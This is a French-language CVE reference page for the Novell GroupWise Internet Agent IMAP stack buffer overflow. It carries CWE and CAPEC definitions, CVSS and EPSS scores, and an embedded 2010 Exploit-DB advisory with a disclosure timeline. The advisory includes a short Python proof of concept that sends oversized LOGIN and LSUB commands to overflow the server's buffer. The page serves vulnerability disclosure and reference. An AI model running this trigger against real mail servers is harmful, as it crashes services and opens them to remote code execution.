CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Multiple stack-based buffer overflows in the IMAP server component in GroupWise Internet Agent (GWIA) in Novell GroupWise before 8.02HP allow remote attackers to execute arbitrary code via a long (1) LIST or (2) LSUB command.
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
6.5
AV:N/AC:L/Au:S/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
7.43%
–
–
2022-04-03
–
–
7.43%
–
–
2023-02-26
–
–
7.43%
–
–
2023-03-12
–
–
–
35%
–
2023-06-11
–
–
–
32.14%
–
2023-08-06
–
–
–
17.76%
–
2023-09-17
–
–
–
17.76%
–
2023-09-24
–
–
–
17.25%
–
2023-10-29
–
–
–
17.25%
–
2023-11-12
–
–
–
16.1%
–
2023-12-31
–
–
–
19.88%
–
2024-02-11
–
–
–
1.55%
–
2024-03-31
–
–
–
1.73%
–
2024-04-14
–
–
–
1.97%
–
2024-06-02
–
–
–
4.39%
–
2024-07-07
–
–
–
4.99%
–
2024-07-28
–
–
–
5.79%
–
2024-09-01
–
–
–
5.79%
–
2024-09-22
–
–
–
30.94%
–
2024-12-22
–
–
–
14.36%
–
2025-02-02
–
–
–
11.73%
–
2025-01-19
–
–
–
14.36%
–
2025-02-02
–
–
–
11.73%
–
2025-03-18
–
–
–
–
29.58%
2025-03-18
–
–
–
–
29.58,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2010-11-08 23h00 +00:00 Auteur : Francis Provencher EDB Vérifié : Yes
#####################################################################################
Application: Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution Vulnerability
Platforms: SLES 10 SP3 (GroupWise 8.0.2)
Exploitation: Remote code execution
CVE Number:
Novell TID: 7007157
Author: Francis Provencher (Protek Research Lab's)
WebSite: http://www.protekresearchlab.com/
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) The Code
#####################################################################################
===============
1) Introduction
===============
Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in
enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental
in making the Utah Valley a focus for technology and software development. Novell technology contributed to the
emergence of local area networks, which displaced the dominant mainframe computing model and changed computing
worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients.
(http://en.wikipedia.org/wiki/Novell)
#####################################################################################
============================
2) Report Timeline
============================
2010-08-27 Vulnerability reported to vendor
2010-11-08 Vendor disclose patch
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise
Internet Agent where IMAP services run. Authentication is required to exploit this vulnerability.
The flaw exists within the IMAP functionality included with GWIA. When provided with an overly long LIST or LSUB request
to the CREATE verb, the IMAP server can be forced to overflow a buffer on the stack. Successful exploitation leads to
remote code execution under the context of the server.
#####################################################################################
===========
4) The Code
===========
#!/usr/bin/python
#
# Francis Provencher for Protek Research Lab's.
#
#
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = '\x41' * 1368
s.connect(('192.168.100.178',143))
s.recv(1024)
s.send('A001 LOGIN test test ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 LSUB aa ' + buffer + '\r\n')
s.recv(1024)
s.close()
#####################################################################################
(PRL-2010-08)